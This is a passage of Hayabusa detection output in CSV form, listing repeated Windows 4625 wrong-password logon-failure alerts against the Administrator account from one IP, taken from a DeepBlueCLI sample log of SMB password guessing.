| Type: 3 | Computer: 29vkwuFa6njYc86s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.842 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s9687XPVHFiwttdm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AcNGaeTqTydGinJE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.918 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWRu7ZC1eo1nn0IQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.071 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M52CihyrQk9MOfCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.134 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xBKSOZwS6f9ofXu7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.185 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uT1LHJs7kyeMmTtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.237 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7FvZhetkdjnZOSpq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.284 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0DDC7WfL5T4d01yT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.330 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1dUzuddZH3Stespw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.376 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LKpORcDX0ccf1xMq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.408 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4RbbKttCYPld8RR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.456 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: joni643cVcuBZH9K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.509 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqY6TkW782CWKtvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.545 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d8c1I63ULh17l0rN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.594 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cjOtMpWutC9qeSss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.650 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gmsFnerFYwXXe4Wt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.718 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzIZ4vC0E2CYq5mc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.775 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0uZe50jJH0aj9xZi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.835 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LZM5UuxLymuAMJcw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.874 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iF1dq6UfuqpFpGkf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.938 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NQVTj9OLayvEg8dg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:15.987 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 98F9mULm7DsRUN49 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.047 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h6KjEOAdknvIMwOA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UHUu0OKm8fsHTnum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.140 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esdoSyg6HkaSiJ0z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.192 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M4lnVe7qNVEspxFV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.236 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Phei86bKte1UCbMi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.280 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ehA1LQ2Rs0Wts9JW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.318 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WcXtnkpww8HlSBb3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.372 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y8U7FrQZgDvQ09Uq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.430 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UgWwCtz3Gnoq9zYd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.478 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRNPwCogYrwSGeZf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.523 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6O9rWY8UGCbuhSwZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.552 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HuH4avUJ4AwqXTGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.617 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: japOFEaHgyT3T2fO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXpRMMNJRgjmd4km | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.706 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtTXA6BiiVyv42cj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.749 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wfYkwvNOfKj7rlTj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.805 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QzAZyceDjfmUOdz6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.849 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C0Qais0cF8avXJQ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.940 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7KBM2fIEK6pEl7F2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:16.972 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N3stckaysFk58QAF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.017 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oVK4S15DDLWISQ7i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.070 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAA1bFLD5YMohS9q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.105 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k5V3sfIsj4kYtaGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.152 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJw4MBG0cvIz2fMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXJ0UBfKCzLXJ5y0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.232 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z3A2mmYGcjHBbX3M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.268 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oGlR6pBLnDrzMsqu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gv7nWzZ1HN9mgTya | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.418 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dnPUb3w2d7Ltif2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.521 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCWXdvBeDPpeKhWJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.576 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GN3OXSzQqLDF348i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAWiBhYPNQ0RUuOX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.662 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5CBG3hblqr8kvWw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.706 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MDBaKpfYttm4H1gj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.743 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PNszt6piEznMlTdF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.789 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iqmBPOQIG6M1rZjX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.844 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BJs7tuZpsPMYJHOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.880 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LUT5oe2DwS5vW84K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.928 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3OTe0uiDHhf5GzRL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:17.964 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71TuxFRZFyZEQp1S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRvTmizOLj3UUpD7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.044 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LnQEZPWaN2OkpTLa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.076 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnHR9DAtgzu561sx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.128 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DfBl3dbluZ7GiFum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.168 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1Hlgn7gsZwRvlXAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.212 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eyHVPtGpnmmRjJuO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F0l3QC0rLt9yGaIe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.289 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XfEng3JgXLmgI8GN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.334 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ORIegzlkHy8AX6RW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.377 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AzS4xRnHKxSwz5sZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.415 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0hA1XvRIlqwKG6g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.464 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mKXKkvlHvjRh33Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.582 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JIMTGRC5IQlkrG9c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.658 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NYcLsxwbg8LkGCuQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.720 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kmttijRBtXqEbU0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:18.765 